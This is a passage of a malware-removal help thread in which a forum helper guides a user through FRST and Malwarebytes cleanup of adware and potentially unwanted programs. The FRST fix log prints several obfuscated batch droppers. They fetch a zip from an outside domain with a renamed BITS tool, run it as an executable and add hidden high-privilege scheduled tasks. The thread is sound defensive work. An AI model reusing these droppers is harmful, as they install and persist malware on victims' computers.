2017-11-25 17:09 - 2017-08-16 08:31 - 000838200 _____ (BlueStack Systems, Inc.) C:\Users\Franco\AppData\Local\Temp\BlueStacksClientUninstaller.exe
2017-11-25 17:09 - 2017-08-16 08:30 - 000421400 _____ (CodeTitans) C:\Users\Franco\AppData\Local\Temp\JSON.dll
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2018-01-10 13:49
 
==================== End of FRST.txt ============================

Edited by Pepsiman22, 15 January 2018 - 06:23 PM.


#4 Aura

    Bleepin' Special Ops

  • Malware Response Team
  • 19,602 posts
  • Gender:Male
  • Local time:12:34 PM

Posted 15 January 2018 - 08:38 PM

No need to use the spoiler tags here; they would get more in the way than anything else :P

On a side note, can you provide me the Malwarebytes log you got when you ran a scan to remove the infection? If it didn't detect anything, let me know.

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#5 Pepsiman22

  • Topic Starter
  • Members
  • 7 posts
  • Local time:01:34 PM

Posted 15 January 2018 - 09:39 PM

Here we go. Had to translate most of it myself, since I have it in Spanish (definitely my bad).
 

Malwarebytes
www.malwarebytes.com
 
-Registry Details-
analysis date: 15/1/18
analysis time: 1:36
registry file: b6dcd614-f9ad-11e7-88d5-d0509965a841.json
Administrator: yes
 
-Software info-
Version: 3.3.1.2183
component version: 1.0.262
Update package version: 1.0.3695
License: Prueba
 
-System info-
SO: Windows 7 Service Pack 1
CPU: x64
Sistem files: NTFS
User: Porota\Franco
 
-analysis summary-
Analysis type: Threats analysis
Result: Completed
Analyzed objects: 234505
threats detected: 56
threats in quarantine: 56
Time spent: 5 min, 0 seg
 
-analysis options-
Memory: enabled
Startup: enabled
File system: enabled
File: enabled
Rootkits: Disabled
Heurístic: enabled
PUP: Detect
PUM: Detect
 
-Analysis Detail-
Process: 0
(No threats detected)
 
Module: 0
(No threats detected)
 
Registry key: 6
PUP.Optional.MailRu, HKU\S-1-5-21-2176517476-3644118065-910164434-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}, Will be deleted on startup, [611], [382913],1.0.3695
PUP.Optional.MailRu, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\hcadgijmedbfgciegjomfpjcdchlhnif, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\bhjhnafpiilpffhglajcaepjbnbjemci, Will be deleted on startup, [611], [448286],1.0.3695
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\DZOPERCOMJHAR, Will be deleted on startup, [39], [475864],1.0.3695
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{BC1705E7-7DCA-42FC-8F6B-5812E8A13A0B}, Will be deleted on startup, [39], [475864],1.0.3695
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{BC1705E7-7DCA-42FC-8F6B-5812E8A13A0B}, Will be deleted on startup [39], [475864],1.0.3695
 
Registry Value: 4
PUP.Optional.MailRu, HKU\S-1-5-21-2176517476-3644118065-910164434-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}|URL, Will be deleted on startup, [611], [382913],1.0.3695
PUP.Optional.MailRu, HKU\S-1-5-21-2176517476-3644118065-910164434-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}|FAVICONURLFALLBACK, Will be deleted on startup, [611], [382913],1.0.3695
PUP.Optional.MailRu, HKU\S-1-5-21-2176517476-3644118065-910164434-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}|SUGGESTIONSURL, Will be deleted on startup, [611], [382913],1.0.3695
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{BC1705E7-7DCA-42FC-8F6B-5812E8A13A0B}|PATH, Will be deleted on startup, [39], [475863],1.0.3695
 
Registry Data: 0
(No threats detected)
 
data sequence: 0
(No threats detected)
 
Folder: 10
PUP.Optional.WinThruster, C:\ProgramData\Solvusoft\Solvusoft Suite\Logs, Will be deleted on startup, [7812], [461214],1.0.3695
PUP.Optional.WinThruster, C:\PROGRAMDATA\SOLVUSOFT\SOLVUSOFT SUITE, Will be deleted on startup, [7812], [461214],1.0.3695
PUP.Optional.MailRu, C:\PROGRAM FILES (X86)\MAIL.RU, Will be deleted on startup, [611], [384138],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\integration\distribution, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\integration\unity, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\integration, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\_metadata, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\icons, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\USERS\FRANCO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\EXTENSIONS\hcadgijmedbfgciegjomfpjcdchlhnif, Will be deleted on startup [611], [448282],1.0.3695
 
File: 36
PUP.Optional.MailRu, C:\USERS\FRANCO\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\MAIL.RU.LNK, Will be deleted on startup, [611], [384473],1.0.3695
PUP.Optional.MailRu, C:\USERS\FRANCO\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\AA5KQNF6.DEFAULT\EXTENSIONS\{A38384B3-2D1D-4F36-BC22-0F7AE402BCD7}.XPI, Will be deleted on startup, [611], [458842],1.0.3695
PUP.Optional.MailRu.Generic, C:\USERS\FRANCO\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\AA5KQNF6.DEFAULT\EXTENSIONS\homepage@mail.ru.xpi, Will be deleted on startup [7605], [462926],1.0.3695
PUP.Optional.MailRu.Generic, C:\USERS\FRANCO\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\AA5KQNF6.DEFAULT\EXTENSIONS\search@mail.ru.xpi, Will be deleted on startup, [7605], [462926],1.0.3695
PUP.Optional.WinThruster, C:\PROGRAMDATA\SOLVUSOFT\SOLVUSOFT SUITE\LOGS\Service.log.txt, Se eliminará al reiniciar, [7812], [461214],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\icons\128.png, Will be deleted on startup [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\icons\16.png, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\icons\48.png, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\icons\512.png, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\integration\distribution\background.js,Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\integration\distribution\distribution-module.js, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\integration\unity\unity-stub-background.js, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\integration\unity\unity-stub-inject.js, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\_metadata\computed_hashes.json, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\_metadata\verified_contents.json, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\manifest.json, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\metrics.js, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\USERS\FRANCO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\USERS\FRANCO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Preferences, Replaced, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\USERS\FRANCO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [611], [448286],1.0.3695
PUP.Optional.MailRu, C:\USERS\FRANCO\FAVORITES\Mail.Ru Агент - используй для общения!.url, Will be deleted on startup, [611], [471428],1.0.3695
PUP.Optional.MailRu, C:\USERS\FRANCO\FAVORITES\Mail.Ru.url, Will be deleted on startup, [611], [471428],1.0.3695
PUP.Optional.StartPage, C:\WINDOWS\SYSTEM32\TASKS\DZOPERCOMJHAR, Will be deleted on startup, [39], [475864],1.0.3695
PUP.Optional.GameHack, C:\PROGRAM FILES (X86)\CHEAT ENGINE 6.4\STANDALONEPHASE1.DAT, Will be deleted on startup, [639], [393793],1.0.3695
PUP.Optional.GameHack, C:\PROGRAM FILES (X86)\CHEAT ENGINE 6.7\STANDALONEPHASE1.DAT, Will be deleted on startup, [639], [393793],1.0.3695
CheatTool.CETTrainer, C:\$RECYCLE.BIN\S-1-5-21-2176517476-3644118065-910164434-1000\$R7TEAJ0.ZIP, Will be deleted on startup, [7562], [116813],1.0.3695
Adware.FileTour, C:\USERS\FRANCO\APPDATA\LOCAL\TEMP\IS-3A0SA.TMP\A6A4DE57, Will be deleted on startup, [146], [423225],1.0.3695
Adware.FileTour, C:\USERS\FRANCO\APPDATA\LOCAL\TEMP\IS-8GSTD.TMP\A2268E72, Will be deleted on startup, [146], [413261],1.0.3695
Adware.FileTour, C:\USERS\FRANCO\APPDATA\LOCAL\TEMP\IS-G4H9S.TMP\93B2FB10, Will be deleted on startup, [146], [413261],1.0.3695
Adware.FileTour, C:\USERS\FRANCO\APPDATA\LOCAL\TEMP\IS-3A0SA.TMP\FFC823AA, Will be deleted on startup, [146], [413261],1.0.3695
Adware.FileTour, C:\USERS\FRANCO\APPDATA\LOCAL\TEMP\IS-CCIF7.TMP\2D49C819, Will be deleted on startup, [146], [413261],1.0.3695
Adware.FileTour, C:\USERS\FRANCO\APPDATA\LOCAL\TEMP\IS-8GSTD.TMP\536D6540, Will be deleted on startup, [146], [423225],1.0.3695
Adware.FileTour, C:\USERS\FRANCO\APPDATA\LOCAL\TEMP\IS-FS4QU.TMP\KAV2.DLL, Will be deleted on startup, [146], [423225],1.0.3695
Adware.FileTour, C:\USERS\FRANCO\APPDATA\LOCAL\TEMP\IS-4NH42.TMP\C623B310, Will be deleted on startup, [146], [413261],1.0.3695
Adware.FileTour, C:\USERS\FRANCO\APPDATA\LOCAL\TEMP\IS-FS4QU.TMP\DBA78BB6, Will be deleted on startup, [146], [413261],1.0.3695
PUP.Optional.MailRu, C:\USERS\FRANCO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [611], [477962],1.0.3695
 
 
physical sector: 0
(No threats detected)
 
 
(end)

Edited by Pepsiman22, 15 January 2018 - 09:39 PM.


#6 Aura (Bleepin' Special Ops, Malware Response Team)

Posted 16 January 2018 - 08:03 AM

No need to translate any logs, I understand them just fine :)

Farbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Download the attached fixlist.txt file, and save it on your Desktop (or wherever your FRST.exe/FRST64.exe executable is located)
  • Right-click on the FRST executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Click on the Fix button
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad
  • Copy and paste its content in your next reply

Attached Files


Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#7 Pepsiman22 (Topic Starter)

Posted 16 January 2018 - 04:35 PM

Here you go! :)

Fix result of Farbar Recovery Scan Tool (x64) Version: 14.01.2018
Ran by Franco (16-01-2018 18:32:02) Run:1
Running from C:\Users\Franco\Downloads
Loaded Profiles: Franco (Available Profiles: Franco)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:
 
cmd: type "C:\Program Files (x86)\Common Files\OeYgZvEuU"
cmd: type "C:\Program Files (x86)\Common Files\OeYgZvEuU.bat"
cmd: type "C:\Users\Franco\AppData\Roaming\YaOYcLIZDWQaa"
cmd: type "C:\Users\Franco\AppData\Roaming\YaOYcLIZDWQaa.bat"
 
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\clgckgfbhciacomhlchmgdnplmdiadbj
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\dijfnbhlogmffhgpelodglnnkncadnbi
 
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
GroupPolicy: Restriction <==== ATTENTION
GroupPolicy\User: Restriction <==== ATTENTION
 
FF Homepage: Mozilla\Firefox\Profiles\aa5kqnf6.default -> hxxps://inline.go.mail.ru/homepage?inline_comp=hp&inline_hp_cnt=11956636
FF NewTabOverride: Mozilla\Firefox\Profiles\aa5kqnf6.default -> Enabled: homepage@mail.ru
 
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(6): schtasks.exe -> /Change /TN "\dzopercomjhar" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(15): schtasks.exe -> /Change /TN "\mtxoaIdylJOZ" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(16): schtasks.exe -> /Change /TN "\oieMmex" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(17): schtasks.exe -> /Change /TN "\pSER" /ENABLE
 
AlternateDataStreams: C:\Users\Franco\AppData\Local\Mjc7tFDl:8ozO9lwap8D2aIzrlH [2270]
AlternateDataStreams: C:\Users\Franco\AppData\Local\Temp:ctdNU4MXUVOLiXUVWJ4jPCjB [2028]
 
C:\Program Files (x86)\Common Files\OeYgZvEuU
C:\Program Files (x86)\Common Files\OeYgZvEuU.bat
C:\ProgramData\Mail.Ru
C:\Users\Franco\AppData\Local\Mail.Ru
C:\Users\Franco\AppData\Local\AAfuIkYhYoa.exe
C:\Users\Franco\AppData\Local\WMI.ini
C:\Users\Franco\AppData\Roaming\YaOYcLIZDWQaa
C:\Users\Franco\AppData\Roaming\YaOYcLIZDWQaa.bat
 
 
EmptyTemp:
*****************
 
Processes closed successfully.
Restore point was successfully created.
 
========= type "C:\Program Files (x86)\Common Files\OeYgZvEuU" =========
 
@echo off
c%AopQKJioeUAoE%opy /y "C:%yIvEwYirtI%\Users\Franco\Ap%yVhGdeAoOuEe%pData\Roaming\YaOYcLIZDWQaa" "C:\U%oqfAiAyigHB%sers\Fra%cukSI%nco\AppData\Roaming\Ya%oeAOyeIACra%OYcLIZDWQaa.bat"
copy /y "C:\Program F%zBbJYVAq%iles (x86)\XASormJT" "C:\Program Fil%uRIWV%es (%YapiY%x86)\XASor%KJKCe%mJT.b%IuDagdEU%at"
sc%onsVyuBYmaY%htasks /create /tn "oie%UUzN%Mmex" /tr "'C:\Progra%EYUpIAimar%m Files (x86)%YaEXyuZfpcV%\XASormJT.bat' " /s%EoSfOTY%c ONLOGO%qNWM%N /de%rBPBuA%lay 0003:00 /rl highest /f
set wEaOyyaOAMI%gAyAEY%=%RaNdom%%RAndoM%
"C:\Users\F%RRGdGACyB%ranc%ioOCnUoY%o\AppData\Local\AAfuIkYhYoa.exe" /T%bOBeIHAOEKcZ%RaNsFER C%IAcAzbo%iXV /doWnlOAD /PrI%LemSiAsvpLE%orIty High http://domainpr%ugTAscYo%ompt.%Ypya%in%RuYeNZOuaOuE%f%AMuUKy%o%AYDOauoYUoisc%/lg%yEWfOBXnSI%0t%RJHaUEQUl%6btu1qdg.zip "%evIAhbEYAK%C:\Users\Franco\%uYAYjuA%AppDa%ywSnGaOeYYO%ta\Local\Temp\OoiaywSo%EYjeuurHpNC%l.zip"
rename "C:\%lzuUNhaYyiMN%User%iZaoyzAPhu%s\Franco\AppData\Local\Temp%Efhi%\OoiaywSol.zip" %wEaOyyaOAMI%.ex%yrhIAuOiiOua%e
cmd /c ""C:\Users\Franco\App%rEaAMHXESIh%Data%uYIaEuOID%\Local\Temp%TevoOwUoecf%\%wEaOyyaOAMI%.exe" i"%acEeYUUu%
========= End of CMD: =========
 
 
========= type "C:\Program Files (x86)\Common Files\OeYgZvEuU.bat" =========
 
@echo off
c%AopQKJioeUAoE%opy /y "C:%yIvEwYirtI%\Users\Franco\Ap%yVhGdeAoOuEe%pData\Roaming\YaOYcLIZDWQaa" "C:\U%oqfAiAyigHB%sers\Fra%cukSI%nco\AppData\Roaming\Ya%oeAOyeIACra%OYcLIZDWQaa.bat"
copy /y "C:\Program F%zBbJYVAq%iles (x86)\XASormJT" "C:\Program Fil%uRIWV%es (%YapiY%x86)\XASor%KJKCe%mJT.b%IuDagdEU%at"
sc%onsVyuBYmaY%htasks /create /tn "oie%UUzN%Mmex" /tr "'C:\Progra%EYUpIAimar%m Files (x86)%YaEXyuZfpcV%\XASormJT.bat' " /s%EoSfOTY%c ONLOGO%qNWM%N /de%rBPBuA%lay 0003:00 /rl highest /f
set wEaOyyaOAMI%gAyAEY%=%RaNdom%%RAndoM%
"C:\Users\F%RRGdGACyB%ranc%ioOCnUoY%o\AppData\Local\AAfuIkYhYoa.exe" /T%bOBeIHAOEKcZ%RaNsFER C%IAcAzbo%iXV /doWnlOAD /PrI%LemSiAsvpLE%orIty High http://domainpr%ugTAscYo%ompt.%Ypya%in%RuYeNZOuaOuE%f%AMuUKy%o%AYDOauoYUoisc%/lg%yEWfOBXnSI%0t%RJHaUEQUl%6btu1qdg.zip "%evIAhbEYAK%C:\Users\Franco\%uYAYjuA%AppDa%ywSnGaOeYYO%ta\Local\Temp\OoiaywSo%EYjeuurHpNC%l.zip"
rename "C:\%lzuUNhaYyiMN%User%iZaoyzAPhu%s\Franco\AppData\Local\Temp%Efhi%\OoiaywSol.zip" %wEaOyyaOAMI%.ex%yrhIAuOiiOua%e
cmd /c ""C:\Users\Franco\App%rEaAMHXESIh%Data%uYIaEuOID%\Local\Temp%TevoOwUoecf%\%wEaOyyaOAMI%.exe" i"%acEeYUUu%
========= End of CMD: =========
 
 
========= type "C:\Users\Franco\AppData\Roaming\YaOYcLIZDWQaa" =========
 
@echo off
copy /y "C:\Program Files (x86)\Commo%umxUVraviEs%n FileîiW%s\O%zOgiAS%eYgZvEuU" "C:\Program Files (x86)\%YoNNA%Common Files\OeYgZvEuU.bat"
co%AQILU%py /%eEeElb%y "C:\Windows\EOr%oHxSgaOcea%UYoez" "C:%roek%\W%OUoOoMKG%indows\EOrU%ohYfXCbCyc%Yoez.bat"
sc%aOoNcoua%h%eiUGI%t%pQoRdyiEXi%ask%ecAx%s /create /tn "mtxoaIdylJOZ" /tr "'%AZJNXoWymE%C:\Windows\EOrUYoe%btoYNu%z.bat' " /sc m%ceoAaIUOxy%inute /mo 180 /rl highest /f
set FuuqL=%RANdom%%raNdom%
"C:\Users\%arApXXuUeeor%Fr%nyOASqyL%an POeeLuJyUB%co\AppData\Local\AAfuIkYh%YfLniyn%Yoa.exe" /tRanSFeR CYy%uuIjE%XZeDIyZQ /dO%ooyyoWieUUsj%WnLoAd /pRiORITy high http://domainpr iEeQTe%ompt.info/lg0t6btu1qdg.zip "C:\Users\Franco\%iYdIoEF%AppDa%yaIhI%ta\Local%soFueOuz%\%yLaIcmY%Temp\%QPUhnUYIwAi%ep%IAyuYuU%AZufo.zip"
rename "C:\%aoaCvEeK%Us%ZGuuQ%e%rIII%rs\Franco\%tNacYQiMQsbc%A%QyYQVrsPer%ppData\Local\%cAaCUyJyyoIUI%Temp\epAZufo.zip" %FuuqL%.e%eYroScu%xe
cmd /c ""C:%NYygPdjAiK%\Users\Franco\A%AIbIyEEa%ppDa%EOdjbyyEE%ta\L%hgwU%ocal\%SAyG%Temp\%FuuqL%.exe" i"
========= End of CMD: =========
 
 
========= type "C:\Users\Franco\AppData\Roaming\YaOYcLIZDWQaa.bat" =========
 
@echo off
copy /y "C:\Program Files (x86)\Commo%umxUVraviEs%n FileîiW%s\O%zOgiAS%eYgZvEuU" "C:\Program Files (x86)\%YoNNA%Common Files\OeYgZvEuU.bat"
co%AQILU%py /%eEeElb%y "C:\Windows\EOr%oHxSgaOcea%UYoez" "C:%roek%\W%OUoOoMKG%indows\EOrU%ohYfXCbCyc%Yoez.bat"
sc%aOoNcoua%h%eiUGI%t%pQoRdyiEXi%ask%ecAx%s /create /tn "mtxoaIdylJOZ" /tr "'%AZJNXoWymE%C:\Windows\EOrUYoe%btoYNu%z.bat' " /sc m%ceoAaIUOxy%inute /mo 180 /rl highest /f
set FuuqL=%RANdom%%raNdom%
"C:\Users\%arApXXuUeeor%Fr%nyOASqyL%an POeeLuJyUB%co\AppData\Local\AAfuIkYh%YfLniyn%Yoa.exe" /tRanSFeR CYy%uuIjE%XZeDIyZQ /dO%ooyyoWieUUsj%WnLoAd /pRiORITy high http://domainpr iEeQTe%ompt.info/lg0t6btu1qdg.zip "C:\Users\Franco\%iYdIoEF%AppDa%yaIhI%ta\Local%soFueOuz%\%yLaIcmY%Temp\%QPUhnUYIwAi%ep%IAyuYuU%AZufo.zip"
rename "C:\%aoaCvEeK%Us%ZGuuQ%e%rIII%rs\Franco\%tNacYQiMQsbc%A%QyYQVrsPer%ppData\Local\%cAaCUyJyyoIUI%Temp\epAZufo.zip" %FuuqL%.e%eYroScu%xe
cmd /c ""C:%NYygPdjAiK%\Users\Franco\A%AIbIyEEa%ppDa%EOdjbyyEE%ta\L%hgwU%ocal\%SAyG%Temp\%FuuqL%.exe" i"
========= End of CMD: =========
 
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\clgckgfbhciacomhlchmgdnplmdiadbj" => removed successfully
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\dijfnbhlogmffhgpelodglnnkncadnbi" => removed successfully
"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => removed successfully
C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
C:\Windows\SysWOW64\GroupPolicy\GPT.ini => moved successfully
C:\Windows\system32\GroupPolicy\User => moved successfully
"Firefox homepage" => removed successfully
"Firefox NewTabOverride (homepage@mail.ru) " => removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{53B84441-F5CF-4379-AC97-73520A813C20} => could not remove key. ErrorCode1: 0x00000002
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{53B84441-F5CF-4379-AC97-73520A813C20}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\TreeC:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(6): schtasks.exe" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{53B84441-F5CF-4379-AC97-73520A813C20}" => removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{53B84441-F5CF-4379-AC97-73520A813C20} => key not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\TreeC:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(15): schtasks.exe" => not found
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{53B84441-F5CF-4379-AC97-73520A813C20} => key not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\TreeC:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(16): schtasks.exe" => not found
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{53B84441-F5CF-4379-AC97-73520A813C20} => key not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\TreeC:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(17): schtasks.exe" => not found
C:\Users\Franco\AppData\Local\Mjc7tFDl => ":8ozO9lwap8D2aIzrlH" ADS removed successfully
C:\Users\Franco\AppData\Local\Temp => ":ctdNU4MXUVOLiXUVWJ4jPCjB" ADS removed successfully
C:\Program Files (x86)\Common Files\OeYgZvEuU => moved successfully
C:\Program Files (x86)\Common Files\OeYgZvEuU.bat => moved successfully
C:\ProgramData\Mail.Ru => moved successfully
C:\Users\Franco\AppData\Local\Mail.Ru => moved successfully
C:\Users\Franco\AppData\Local\AAfuIkYhYoa.exe => moved successfully
C:\Users\Franco\AppData\Local\WMI.ini => moved successfully
C:\Users\Franco\AppData\Roaming\YaOYcLIZDWQaa => moved successfully
C:\Users\Franco\AppData\Roaming\YaOYcLIZDWQaa.bat => moved successfully
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 37217888 B
Java, Flash, Steam htmlcache => 17193782 B
Windows/system/drivers => 53873999 B
Edge => 0 B
Chrome => 394889007 B
Firefox => 392367499 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 117050590 B
systemprofile32 => 66228 B
LocalService => 0 B
NetworkService => 66228 B
Franco => 1508682558 B
 
RecycleBin => 0 B
EmptyTemp: => 2.3 GB temporary data Removed.
 
================================
 
 
The system needed a reboot.
 
==== End of Fixlog 18:33:19 ====
